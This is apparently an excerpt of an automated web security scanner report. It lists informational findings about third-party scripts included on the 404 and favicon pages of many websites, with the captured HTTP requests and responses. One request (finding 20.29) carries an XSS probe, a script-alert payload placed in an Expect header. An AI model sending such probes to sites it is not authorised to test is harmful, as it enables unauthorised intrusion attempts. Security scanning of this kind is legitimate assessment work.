Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 58682

<html><head><title>P.gina no encontrada - DEGUATE.com</title>
<meta NAME="DESCRIPTION" CONTENT="DEGUATE.com es el portal de mayor tr.fico en Guatemala">
<meta NAME="KEYWORDS" CONTENT="prensa libre,sig
...[SNIP]...

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<SCRIPT type='text/javascript' language='JavaScript' src='http://xslt.alexa.com/site_stats/js/s/a?url=www.deguate.com'></SCRIPT>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.20. http://www.donbest.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.donbest.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.0.3/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,dragdrop
http://ajax.googleapis.com/ajax/libs/swfobject/2/swfobject.js
http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js
https://s3.amazonaws.com/www.donbest.com.001/1060.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.donbest.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:48:11 GMT
Server: Microsoft-IIS/6.0
node: 01
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vlczw255t5fqew55fn1sxmim; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_pagehead"><meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.0.3/prototype.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,dragdrop"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2/swfobject.js"></script>
...[SNIP]...
</script>
<script language="javascript" type="text/javascript" src="https://s3.amazonaws.com/www.donbest.com.001/1060.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js"></script>
...[SNIP]...

20.21. http://www.edgarsnyder.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.edgarsnyder.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.edgarsnyder.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:20:19 GMT
Server: Apache/1.3.35 (Unix) mod_gzip/1.3.26.1a FrontPage/5.0.2.2635 mod_perl/1.29 mod_ssl/2.8.26 OpenSSL/0.9.7c
Vary: *
Content-Type: text/html
Content-Length: 22944

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://ogp.me/ns#" xmlns="http://ww
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.22. http://www.extrabux.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.extrabux.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://www.googleadservices.com/pagead/conversion.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.extrabux.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html
Date: Tue, 03 May 2011 10:34:39 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.2.12 (Ubuntu)
Set-Cookie: PHPSESSID=2f2ecf4bf2c1a47c48a77b5635c59a1b; path=/
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.10-2ubuntu6.9
Content-Length: 7479
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equi
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.23. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js

Request

Response

20.24. http://www.fateback.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fateback.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fateback.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:44:45 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21859

<html>
<head>
<TITLE>Domain hosting and multiple domain hosting with free domain names</TITLE>
<META content="2 domain hosting plans with free domain name or transfer, free web template and free web d
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.25. http://www.findire.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.findire.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.findire.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

20.26. http://www.foodsaver.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.foodsaver.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://d9lq0o81skkdj.cloudfront.net/k/5ndw1/1k.js
http://e.nexac.com/e/a-1078/s-2272.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.foodsaver.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

20.27. http://www.fortunecity.co.uk/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fortunecity.co.uk
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://d3.zedo.com/jsc/d3/fo.js
http://www.google-analytics.com/urchin.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fortunecity.co.uk
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:40:32 GMT
Server: Apache/1.3.41 (Unix) PHP/5.3.0
Last-Modified: Tue, 19 Jan 2010 18:51:23 GMT
ETag: "11a4b7e-19b6-4b55ff2b"
Accept-Ranges: bytes
Content-Length: 6582
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<title>FortuneCity 404 File Not Found</title>
<meta name="description" content="Web
...[SNIP]...
</script>
<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.28. http://www.getfreedental.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.getfreedental.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.getfreedental.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:10:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
Content-Length: 25155
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQAABCTAT=NCCNBJODMOAGBNBOFDMLLDNI; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Get Free Dental
...[SNIP]...
</script>
                <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<p><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
       <script type="text/javascript"
       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
       </script>
...[SNIP]...

20.29. http://www.gizmodefenderstore.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gizmodefenderstore.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://as.casalemedia.com/sd?s=95308&f=1

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gizmodefenderstore.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:59:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 60358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
www.gi
...[SNIP]...
</script>
<script language="javascript" src="http://as.casalemedia.com/sd?s=95308&f=1"></script>
...[SNIP]...

20.30. http://www.grayline.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.grayline.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.grayline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

20.31. http://www.greatnow.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.greatnow.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://redvase.bravenet.com/javascripts/redvase.js
http://stattrack.0catch.com/stat.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.greatnow.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:22:48 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
X-Cache: MISS from squid2.0catch.com
Connection: close

<!--
DOCUMENT_ROOT = /home/catch/htdocs
GATEWAY_INTERFACE = CGI/1.1
HTTP_ACCEPT = */*
HTTP_CACHE_CONTROL = max-age=259200
HTTP_CONNECTION = keep-alive
HTTP_HOST = greatnow.com
HTTP_USER_AGENT = curl/7
...[SNIP]...
</script>
<script src="http://redvase.bravenet.com/javascripts/redvase.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="javascript" src="http://stattrack.0catch.com/stat.js"></script>
...[SNIP]...

20.32. http://www.gtop100.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gtop100.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:17:13 GMT
Server: LiteSpeed
Connection: close
Set-Cookie: PHPSESSID=ac12eeade9fe5d5ace0f531555e28985; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 90214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

20.33. http://www.halldata.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.halldata.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

https://www.google.com/jsapi

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.halldata.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:26:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=cpokzb45kc2lqc55t00ksg55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14313

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xm
...[SNIP]...
xd?files=%2fincludes%2fmaster.css,%2fincludes%2fmisc.css,%2fincludes%2fforms.css,%2fincludes%2fbase.css,%2fincludes%2fjquery.jdMenu.css,%2fincludes%2fskins%2fradtooltip%2ftooltip.acme.css" />

<script type="text/javascript" src="https://www.google.com/jsapi"></script>
...[SNIP]...

20.34. http://www.herehard.tv/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.herehard.tv
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://img.seekandsee.com/js/perlover_srch.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.herehard.tv
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.1
Date: Tue, 03 May 2011 11:25:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8829
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Tue, 03 May 2011 11:25:25 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - Here Hard Movies</title>
<!-- SRC
...[SNIP]...
</SCRIPT>
<script src="http://img.seekandsee.com/js/perlover_srch.js"></script>
...[SNIP]...

20.35. http://www.heresquirt.tv/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.heresquirt.tv
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://img.seekandsee.com/js/perlover_srch.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.heresquirt.tv
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Tue, 03 May 2011 11:20:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8746
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Tue, 03 May 2011 11:20:20 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - Here Squirt Movies</title>
<!-- S
...[SNIP]...
</SCRIPT>
<script src="http://img.seekandsee.com/js/perlover_srch.js"></script>
...[SNIP]...

20.36. http://www.holdonsecuritysite.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.holdonsecuritysite.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://as.casalemedia.com/sd?s=95308&f=1

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.holdonsecuritysite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:27:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 60358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
www.ho
...[SNIP]...
</script>
<script language="javascript" src="http://as.casalemedia.com/sd?s=95308&f=1"></script>
...[SNIP]...

20.37. http://www.ipodarcade.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ipodarcade.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ipodarcade.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:47:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=0, no-store
Content-Type: text/html
Content-Length: 5287

<!DOCTYPE html>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">

   <title>iPod Arcade | Free iPod Games | Games for your iPod</title>

   <link href="/css/global.css"
...[SNIP]...
</script>
                       <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

20.38. http://www.journalofaccountancy.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.journalofaccountancy.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/journalofaccountancy.com/Home;abr=!webtv;sz=336x90;ord=603229233?

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.journalofaccountancy.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 37253
Content-Type: text/html
Last-Modified: Tue, 04 Jan 2011 19:49:08 GMT
Accept-Ranges: bytes
ETag: "0d22a7348accb1:53fc"
Server: Web Server 1.0
X-UA-Compatible: IE=EmulateIE7
Date: Tue, 03 May 2011 11:16:06 GMT
Set-Cookie: NSC_wt-bjdqbdnt-80=ffffffff091e1ed245525d5f4f58455e445a4a423660;expires=Tue, 03-May-2011 11:46:06 GMT;path=/;httponly

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Journal o
...[SNIP]...
<span id="ctl00_ctl00_HtmlBody_HouseAd" Title="2"><script language="Javascript1.1" src="http://ad.doubleclick.net/adj/journalofaccountancy.com/Home;abr=!webtv;sz=336x90;ord=603229233?">

</script>
...[SNIP]...

20.39. http://www.maysville-online.com/content/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.maysville-online.com
Path:	/content/

Issue detail

The response dynamically includes the following scripts from other domains:

http://adsys.townnews.com/creative/maysv-www2.maysville-online.com/top_homes/static.js
http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js
http://e.yieldmanager.net/script.js
http://edge.quantserve.com/quant.js
http://images.townnews.com/leetemplates.com/app/images/omniture/maysville.js
http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js

Request

GET /content/ HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: TNNoMobile=1

Response

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4640100
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 15:40:09 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 1.2228
X-PHP-Engine: enabled
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp4
Connection: Keep-Alive
X-Cache-Info: cached
Content-Length: 35165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<link rel="shortcut icon" type="image/x-icon" href="http://www.maysville-online.com/content/" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
</script>
<script src="http://e.yieldmanager.net/script.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js"></script>
...[SNIP]...
<div id="top-real-estate" style="float:left; width:160px;">
   <script type="text/javascript" src="http://adsys.townnews.com/creative/maysv-www2.maysville-online.com/top_homes/static.js"></script>
...[SNIP]...
<div id="blox-omniture" class="hide">

           <script type="text/javascript" src="http://images.townnews.com/leetemplates.com/app/images/omniture/maysville.js"></script>
...[SNIP]...

   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

20.40. http://www.maysville-online.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.maysville-online.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://adsys.townnews.com/creative/maysv-www2.maysville-online.com/top_homes/static.js
http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js
http://e.yieldmanager.net/script.js
http://edge.quantserve.com/quant.js
http://images.townnews.com/leetemplates.com/app/images/omniture/maysville.js
http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.maysville-online.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4648736
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 10:47:36 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.2009
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: Keep-Alive
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp6
Content-Length: 34908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<link rel="shortcut icon" type="image/x-icon" href="http://www.maysville-online.com/content/" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
</script>
<script src="http://e.yieldmanager.net/script.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js"></script>
...[SNIP]...
<div id="top-real-estate" style="float:left; width:160px;">
   <script type="text/javascript" src="http://adsys.townnews.com/creative/maysv-www2.maysville-online.com/top_homes/static.js"></script>
...[SNIP]...
<div id="blox-omniture" class="hide">

           <script type="text/javascript" src="http://images.townnews.com/leetemplates.com/app/images/omniture/maysville.js"></script>
...[SNIP]...

   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

20.41. http://www.mnnews.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mnnews.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mnnews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:41:28 GMT
Server: Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Thu, 07 Oct 2010 19:31:34 GMT
ETag: "4d40458-2b1c-f117b180"
Accept-Ranges: bytes
Content-Length: 11036
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8

<html>
   <head>
       <meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
       <meta name="GENERATOR" content="Adobe PageMill 3.0 Mac">
       <title>Missing Page - 404 - Minnesota Newspape
...[SNIP]...
</form>
                       <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

20.42. http://www.monsterjam.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.monsterjam.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://widgets.twimg.com/j/2/widget.js

Request

Response

20.43. http://www.motorracingnetwork.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.motorracingnetwork.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.motorracingnetwork.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
